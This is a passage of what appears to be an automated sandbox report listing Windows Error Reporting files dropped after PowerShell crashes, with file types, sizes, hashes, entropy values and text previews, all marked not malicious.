                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.2.5.5.6.2.4.2.6.6.7.5.4.2.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.2.5.5.4.5.0.0.1.5.3.2.9.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.a.8.4.c.b.b.f.-.5.0.c.5.-.4.9.0.4.-.b.4.9.6.-.7.b.8.9.6.f.3.8.1.c.9.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.9.f.4.-.0.0.0.1.-.0.0.1.5.-.e.2.a.d.-.5.e.8.1.a.b.f.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):0.5344534618272417
                          Encrypted:false
                          SSDEEP:96:YvFajurxYidmRH3Uje0eD/JuNnN9KQXIGZAX/d5FMT2SlPkpXmTAGSf/VXT5NHBx:2yumGmR30wAAzuiFs+Z24lO8
                          MD5:5F2B9E752649241C6C3D599C94CAD7F5
                          SHA1:769E1B4F2B5A978DAA4A9EA5178931C4EEA857C0
                          SHA-256:3A45FB6BDE81EC109E97FDB3AE01596EFEEB7FF8AF72CF8A61BC4584B265C336
                          SHA-512:FE54DBA2629F1899600A1E661CD3AA9EAF83F84A5A95A0217F5D6871E22D80E31C30C922A24C5F4EC9C394820F1238C6C56963296AF7C8C6AF37219FF3019AD3
                          Malicious:false
                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.2.5.5.6.7.3.1.3.4.9.3.4.5.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.2.5.5.4.6.7.1.8.6.8.1.5.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.1.1.1.8.1.b.0.-.5.8.3.5.-.4.6.3.8.-.9.2.f.6.-.9.4.3.3.f.0.a.c.2.c.6.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.b.8.-.0.0.0.1.-.0.0.1.5.-.0.f.e.2.-.2.a.8.b.a.b.f.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):65536
                          Entropy (8bit):0.5342760306769446
                          Encrypted:false
                          SSDEEP:96:6RbFhjEirxYidNRH3Uje0eD/JuNnN9KQXIGZAX/d5FMT2SlPkpXmTADf/VXT5NHn:OXEimGNR30wAAzuiFjZ24lO8
                          MD5:A2FFD365EAB9DC0E69F05F755D5318E7
                          SHA1:62D7F8491E5A20B6741E9946D09083081E401E11
                          SHA-256:E1E929C651F4078BC2AC60DB4389CDD99B1A5B985C59B21DA958BEE5A3833415
                          SHA-512:615CC733512283BCA6268859364FA67F576ABF8706B53150C5972D9B39C09DBDFAD5AAC719B652CE555F44E5CF12A813C7A629AC4312E2C93CF295D8816A8D8C
                          Malicious:false
                          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.9.2.5.5.6.2.0.5.9.0.5.6.7.1.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.9.2.5.5.4.1.9.9.9.9.0.7.0.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.0.9.7.9.7.1.1.-.5.2.8.8.-.4.b.3.a.-.a.b.c.8.-.1.f.7.b.3.0.f.4.9.3.c.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.8.c.-.0.0.0.1.-.0.0.1.5.-.d.5.b.e.-.b.0.6.e.a.b.f.8.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Mini DuMP crash report, 15 streams, Tue Aug 27 18:03:53 2024, 0x1205a4 type
                          Category:dropped
                          Size (bytes):251258
                          Entropy (8bit):3.9196673399820092
                          Encrypted:false
                          SSDEEP:1536:cpQ/mAcFdhACDytTz2IGmkxIJX67uBojRGapN4uE2aOdSVXI4WNxLTgXJ+p:cplNs2IGmkOJKVGc4uEqdyoLTgXJ8
                          MD5:C206CE51ECD18B75AD5B171ADC4BF40F
                          SHA1:42FBB8A4B31A552C715D957F49E20660917D7DBF
                          SHA-256:6872CBB00A2822541603F4BC4B6E8A52918D493204A607F9B6E7D0A835E4EFA5
                          SHA-512:251A83113360BB1B7D5B41077AF0A0EE65F8DA4F86C50D56EAAF3CFA7D783F295B64F471342779CC61FE9B9DAD2B199A9417E9C16CC442D4DF7EB4B0214DC86F
                          Malicious:false
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):8376
                          Entropy (8bit):3.691196671420639
                          Encrypted:false
                          SSDEEP:192:R6l7wVeJMO6pa6YqxSU6lAfgmfZBo2prT89bvOsfqlm:R6lXJd6E6YkSU6l4gmf/o3vNfx
                          MD5:0ECCF0E476D97EF1A9E703D8DC2CEAEA
                          SHA1:A13EE035CEAA83998F728037247F8B1246CD8057
                          SHA-256:1ADC2DE7755AEB791879506265423D9537CDBFB338FB30D4A1F182715A2EF7CE
                          SHA-512:30F459BC659E831E3CA198545C260216DDC109DD31336FD0014A4A6C40CB43FD79E1C880A274E0A6492E4E0FD9022A4CA0D1BB1E13881485E1E3B888AEFA7993
                          Malicious:false
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.5.2.<./.P.i.
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):7416
                          Entropy (8bit):3.68255645121321
                          Encrypted:false
                          SSDEEP:96:RSIU6o7wVetbKWZdd6f6YDwp9XgmfHNV9rewSS5aMFp0lm:R6l7wVeJKWZdAf6YDwp9Xgmftq0polm
                          MD5:39CC0E1214A82851DF795231EDD3A64D
                          SHA1:30DB15BCA78FE0DE810875B017392F346E2DE6C3
                          SHA-256:775285FE21DF9D34D92447146E89033FFA84E96C6C754242A2A9AB88B232AFFA
                          SHA-512:1A43DD49FBB60E4055C62956FF343AB55A0487195AAF78738D057CFE2418E385924CCB04430B5AE7A74720B5119158BDCA9429FA9F70CED17D73F7AC2B6FF9B4
                          Malicious:false
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.5.6.<./.P.i.
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4899
                          Entropy (8bit):4.566996402559338
                          Encrypted:false
                          SSDEEP:48:cvIwWl8zsIJg771I9GhWpW8VYyYm8M4JFKlnOtSFvyq8vT0Otgytfad:uIjfOI79w7VGJFKlndWT0hufad
                          MD5:3F913D99A24997098E0A455C63F72BEA
                          SHA1:23985AA9A395DCF3CD6866B43C49166E04A1DE57
                          SHA-256:F35E92A0FFA9171B468CAC91B30CF303E9F108B7FC5030213265C1F9F3DEFA22
                          SHA-512:220F4063D048EFB7F48C63C36958B504FDE2447327D101B3147FA99EF02CCADAC5B44DCE8E5DD40A855EF4EDCC18A8C6E504AB17ADED1D90AA475638B75CCD96
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="474306" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4745
                          Entropy (8bit):4.461547743504096
                          Encrypted:false
                          SSDEEP:48:cvIwWl8zsIJg77aI9GhWpW8VYQ5Ym8M4JSDuFJ+q8vMDVmLod:uIjfOI7ow7VsJXKWmLod
                          MD5:0968A1853C5115FEF8BFC4CEDF946B4C
                          SHA1:4BAAFF9304AFEBA3117AE055E6BD0AF66E905329
                          SHA-256:5F0F6B23441E077AA09917564F2E6458B42B4161489ED49210B227B97D7E5D28
                          SHA-512:51953E5B48687C3150D5943B0F385C1FB848A34C495B2093C42C6B23E007698104100C5AE7BC767985189A17CC2B7230FDD4DCB49C52754E00659ACEA8A5FBE8
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="474306" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):7416
                          Entropy (8bit):3.683095336272134
                          Encrypted:false
                          SSDEEP:192:R6l7wVeJDahlC6YDmxzMNGgmftq0pFDudm:R6lXJehlC6YCFgmftqMV
                          MD5:94FFBE67C469701A19916433BFD86487
                          SHA1:FF2BE5BB1C1D4AED9BD086FEC40829FD8944E0EC
                          SHA-256:472E72636028264B59472312D3440CA3C7B045E1D10DE321ED558C203058B582
                          SHA-512:42BDD3856735BB5DF51D929694AE62B3DB2325AEE3A280A802A10E40AE82BB5F44EE13B0516AA36D20AEDCC5B917FE80070D51781F8CBA6F7FFD412F4C50D10E
                          Malicious:false
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.5.4.8.<./.P.i.
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Mini DuMP crash report, 15 streams, Tue Aug 27 18:04:09 2024, 0x1205a4 type
                          Category:dropped
                          Size (bytes):239770
                          Entropy (8bit):4.055539217847546
                          Encrypted:false
                          SSDEEP:1536:r4xKYAD3a4cSJCDgKIGVtTjYI2guBojRLapN4uE2aOQSVXR60ILTgHC8PY:r4sag0DYBELc4uEqQyMtLTgHr
                          MD5:DB331FF446BFF181BD612BA1289FB3AB
                          SHA1:BF97A4164BC731FF493CF8D062F440ED19C185A0
                          SHA-256:B51DA3AD522B7C2D1051120E9BA507E0FEC28F3E99F9B7B19660C8660A16D32B
                          SHA-512:26C46EFCDDEB2768368CEF452583EC59A7422DBCF0B3FBA3637B2E4400E8516FEB87E3A5AA36680FF2957B42BA545EE6CE3127C50F42A981E57633B9EAFDB5AB
                          Malicious:false
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4899
                          Entropy (8bit):4.566785023658872
                          Encrypted:false
                          SSDEEP:48:cvIwWl8zsIJg771I9GhWpW8VYgYm8M4JFKlnOtSFz2eyq8vT0OtAytfPd:uIjfOI79w7VMJFKlnceWT05ufPd
                          MD5:B20F98130DB13617AE4D9EF330809C3E
                          SHA1:B69CA037C35EC41DE9A770ADDA07B751C3F98B38
                          SHA-256:1DE74B33B397A29448AA0B61D5D56F249572B5A4917DC2249B51507C3A2ABC7D
                          SHA-512:E507C166D2AB393FBC8FC402D9CDBFB7C2175B1954B4BAE9B55BD702ADE16CE508996BB21187B57F44DC1B6662698A6E8C13FD08A875449D5DB852DA5A22755C
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="474306" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):8378
                          Entropy (8bit):3.6904838644444777
                          Encrypted:false
                          SSDEEP:192:R6l7wVeJp3jQ6l6YjISUdNygmfZBo2prj89bnhsf4tm:R6lXJpTQ6l6YsSUdNygmf/oHnafv
                          MD5:AE319CC294955C96AA0BE46068F9CA12
                          SHA1:F26BA78187711D4D638609CF2C6928033F08DDFD
                          SHA-256:008240F61C4DA258D3EBC2DBE7EF39E8BF62627C953C04B0F78D414334161FD2
                          SHA-512:1461258A4E56BDF7A3F7CCD3D28BDC416D18154C8ED076211713332E019291B5174011B9FDD3ABF3B037F098DC0940943AF4B62BF515C70EEFCB76C459367BFF
                          Malicious:false
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.9.8.4.<./.P.i.
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):4745
                          Entropy (8bit):4.461466537207372
                          Encrypted:false
                          SSDEEP:48:cvIwWl8zsIJg77aI9GhWpW8VYuYm8M4JSDuFv+q8vMD5mL0d:uIjfOI7ow7V2JtK6mL0d
                          MD5:2D01C70A214DA3E24DEE308CD8893392
                          SHA1:E6EE62858252782B49A4785BFB918952C872EF15
                          SHA-256:B50DF2CC77AC0D4E952341318085454137AC945F8651F7D6DA92AFEF3D794C2E
                          SHA-512:95D5B1FB11F3CF281075C35854FA2AE0BD45F82BF4A0FB43C899A3150EE2F03A45938157F298E50A4AEEFF8C13E125F62EAAD9A5AB3147CBA59F10B859056F77
                          Malicious:false
                          Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="474306" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:Mini DuMP crash report, 15 streams, Tue Aug 27 18:04:26 2024, 0x1205a4 type
                          Category:dropped
                          Size (bytes):241182
                          Entropy (8bit):4.062833987854387
                          Encrypted:false
                          SSDEEP:3072:mmplY44jdGJQk2rWB6D/mVgc4uEqcyYLTg8:mY244FSgc4lyOTg
                          MD5:1B18944FC32D26FBE18A3C3C33BA01DD
                          SHA1:C90C7723F8DA5896C844D7CF7F6E1E322CACC6C1
                          SHA-256:E5B5361E771599BC704E4E3828FD59123A3809E3E4A309A75F452C6C5AE21433
                          SHA-512:433BC30AB3FBD489DD002C0D0AB2488A7973C21590CBE5F6B2246A073BC95B7F88A731DF292CFB939FEDB4048891DD9A78DC2D524D7E56D0E984CC83F177C3D9
                          Malicious:false
                          Process:C:\Windows\System32\wermgr.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):7416
                          Entropy (8bit):3.6820403288070755
                          Encrypted:false
                          SSDEEP:96:RSIU6o7wVetbdJ5c/5oK6YDc0ngmfHNV9rewSS5aMA2m:R6l7wVeJdJexN6YDc0ngmftq0pA2m
                          MD5:EAE642D47F326D3DED5A429E39BAF108
                          SHA1:3629AC9D7D332BAF1C0334E65E8BEB4A707A8BD3
                          SHA-256:B2DCF6EFDEBB37971ABA76378079AE0CD6C813EC7273D47A677EF430993C4A2A
                          SHA-512:8A9EA3468A494825E5155F497CCBF8A35FC74FB92CEE6F63D233F365095C21B396B6A964E89ECB772D867A1DDD2D54F138530F2C8AA422440F2BE2101023ABA9
                          Malicious:false
                          Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.7.4.4.<./.P.i.
                          Process:C:\Windows\SysWOW64\WerFault.exe
                          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):8378
